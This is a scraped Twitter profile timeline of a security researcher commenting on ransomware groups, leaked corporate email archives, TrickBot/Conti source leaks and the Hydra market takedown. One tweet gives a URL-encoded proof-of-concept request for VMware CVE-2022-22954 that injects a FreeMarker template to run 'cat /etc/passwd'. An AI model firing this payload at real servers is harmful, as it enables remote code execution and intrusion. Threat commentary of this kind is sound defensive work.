Opens profile photo
Follow
Soufiane Tahiri
@S0ufi4n3
A random infosec/science enthusiast guy... Developed t.me/ransomwatcher TOX:9B31F2DD8E03DB4A7F8E186A92AA83CFB483A110F6EE87199EEA34AD31925245D6F5A2059320
Franceransom.wikiJoined August 2011

Soufiane Tahiri’s Tweets

575,000 emails from Sawatzk. 432 GB leaked on #DistributedDenialofSecrets Clients include Du Pont, Lenovo, Whirlpool, Aveva, Wella, Johnson + Johnson, Cisco, Google, Swatch, Avito, Samsung, Microsoft, Western Union, Saint-gobain, Turkish Airlines, and British American Tobacco.
Image
1
4
11
426,000 emails from Tendertech, a firm specializing in processing financial and banking documents on behalf of businesses and entrepreneurs. Leaked on #DistributedDenialofSecrets Tendertech's partner banks include Transcapitalbank, Bank Uralsib, Bank Soyuz, RGS Bank,...
Image
2
10

Topics to follow

Sign up to get Tweets about the Topics you follow in your Home timeline.

Carousel

#Stormous group started a poll to choose the next target... how the hell do they try to move from attacking low-hanging fruits to these high-profit targets... looking forward to seeing this.
Image
4
12
25
Big Water Dam GIF
GIF
Quote Tweet
Account (nicknames): mango / frances --- mega.nz/file/vLRUXBzJ# --- #trickbotleaks #trickbot #ransomware #malware #conti #trickleaks @briankrebs @VK_Intel @MalwareTechBlog @pancak3lullz @ValeryMarchive @TechCrunch @LawrenceAbrams @Ionut_Ilascu @troyhunt
4
Gentle reminder
Quote Tweet
Please remember: Port 445 is just ONE of the ports that may reach #RPC (CVE-2022-26809) on Windows. #MSRPC does Port 135 (and high port) or in some cases HTTP as well. Don't "close some ports" but "only open ports you need open". #allowlist #dontblocklist
1
8
#VMware CVE-2022-22954 PoC: catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d
that's all folks GIF by Space Jam
GIF
4
85
229
Show this thread
😅
Image
Quote Tweet
Today we announced our strategic partnership with @CrowdStrike, which brings the power of CrowdStrike’s Falcon platform to Mandiant’s industry-leading services helping to protect customers from #cyberthreats. Learn more. ⬇️ mndt.info/3NNAOtP
2
8
The infamous Hydra Market (Russian-language service believed to be the world’s largest illegal darknet marketplace.) shut down by Germany’s Federal Criminal Police Office. Hydra’s bitcoin assets worth 23 million euros seized.
Image
1
3
15
#Stormous took a position against France following the diplomatic position of the latter against #Russia. While I know "Hatta" is somewhere in UEA have no idea what they mean by "We will say Hatta that in the future". I'm taking hints :)
Image
6
2
11
This leak gives some insights on how the coders use Process hollowing, API unhooking, some LOLBins usage, Defender Folder exclusion...
Image
Image
Image
Image
Quote Tweet
Account (nicknames): kaktus / collin / fuzz --- mega.nz/file/qXB2xBpJ# --- #trickbotleaks #trickbot #ransomware #malware #conti #trickleaks @briankrebs @VK_Intel @MalwareTechBlog @pancak3lullz @ValeryMarchive @TechCrunch @LawrenceAbrams @Ionut_Ilascu @troyhunt
2
44
110
Show this thread
Hello , a threat actor is selling VPN and RDP access to your internal network. A mass password reset and probably an incident response should be conducted while it's not too late... Good luck 🤞
Image
4
5
28